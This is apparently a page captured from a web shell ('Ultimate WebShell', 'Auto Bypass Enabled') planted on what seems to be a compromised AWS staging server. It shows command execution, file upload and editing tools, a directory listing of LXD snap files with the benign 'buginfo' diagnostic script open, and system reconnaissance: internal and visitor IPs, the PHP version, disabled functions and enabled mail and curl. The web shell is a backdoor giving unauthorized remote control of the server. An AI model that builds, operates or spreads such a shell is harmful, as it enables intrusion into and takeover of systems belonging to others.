WebShell Manager
Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64
Apache
Server: 172.31.9.152
Your IP: 216.73.216.236
System Info
HOME
snap
lxd
40111
commands
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-06-30 17:18:45
-
buginfo
File
2.21 KB
0755
2026-06-30 15:38:49
daemon.activate
File
3.58 KB
0755
2026-06-30 15:38:49
daemon.reload
File
301 B
0755
2026-06-30 15:38:49
daemon.start
File
21.98 KB
0755
2026-06-30 15:38:49
daemon.stop
File
4.64 KB
0755
2026-06-30 15:38:49
lxc
File
1.79 KB
0755
2026-06-30 15:38:49
lxc-to-lxd
File
554 B
0755
2026-06-30 15:38:49
lxd
File
1.29 KB
0755
2026-06-30 15:38:49
lxd-benchmark
File
715 B
0755
2026-06-30 15:38:49
lxd-check-kernel
File
232 B
0755
2026-06-30 15:38:49
lxd-migrate
File
1.4 KB
0755
2026-06-30 15:38:49
refresh
File
154 B
0755
2026-06-30 15:38:49
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Ultimate WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: buginfo
#!/bin/sh set -u # Re-exec outside of apparmor confinement if [ -d /sys/kernel/security/apparmor ] && [ "$(cat /proc/self/attr/current)" != "unconfined" ]; then exec aa-exec -p unconfined -- "$0" "$@" fi # Check that we're root if [ "$(id -u)" != "0" ]; then echo "error: This tool must be run as root." exit 1 fi # Environment export LXD_DIR="${LXD_DIR:-"${SNAP_COMMON}/lxd/"}" echo "# Base information" if [ -e "/var/lib/snapd/hostfs/etc/os-release" ]; then # shellcheck disable=SC1091 . /var/lib/snapd/hostfs/etc/os-release echo " - Distribution: ${NAME}" echo " - Distribution version: ${VERSION}" else echo " - Distribution: unknown (no os-release)" fi echo " - Kernel version: $(uname -a)" echo " - LXC version: $(lxc --version)" echo " - LXD version: $(lxd --version)" echo " - Snap revision: ${SNAP_REVISION}" echo "" echo "# Detailed snap information" echo '```' nsenter -t 1 -m snap info lxd echo '```' echo "" echo "# Detailed LXD information" if lxc info >/dev/null 2>&1; then echo "## Daemon configuration" echo '```' lxc info echo '```' echo "" echo "## Instances" echo '```' lxc list echo '```' echo "" echo "## Images" echo '```' lxc image list echo '```' echo "" echo "## Storage pools" echo '```' lxc storage list echo '```' echo "" echo "## Networks" echo '```' lxc network list echo '```' echo "" echo "## Projects" echo '```' lxc project list echo '```' echo "" echo "## Profiles" echo '```' lxc profile list echo '```' echo "" echo "## Default profile" echo '```' lxc profile show default echo '```' echo "" if lxc cluster list >/dev/null 2>&1; then echo "## Cluster" echo '```' lxc cluster list echo '```' echo "" fi else echo "LXD daemon unreachable" echo "" fi echo "# Kernel log (last 50 lines)" echo '```' dmesg | tail -n 50 echo '```' echo "" echo "# Daemon log (last 50 lines)" echo '```' tail -n 50 "${SNAP_COMMON}/lxd/logs/lxd.log" echo '```' echo "" echo "# Systemd log (last 50 lines)" echo '```' nsenter -t 1 -m journalctl -u snap.lxd.daemon -n50 | cat echo '```'
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64 Software: Apache PHP Version: 7.4.3-4ubuntu2.29 Protocol: HTTP/1.1 Server IP: 172.31.9.152 Your IP: 216.73.216.236 Mail: ON Curl: ON Owner: www-data MySQL: ON Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Auto Bypass: ENABLED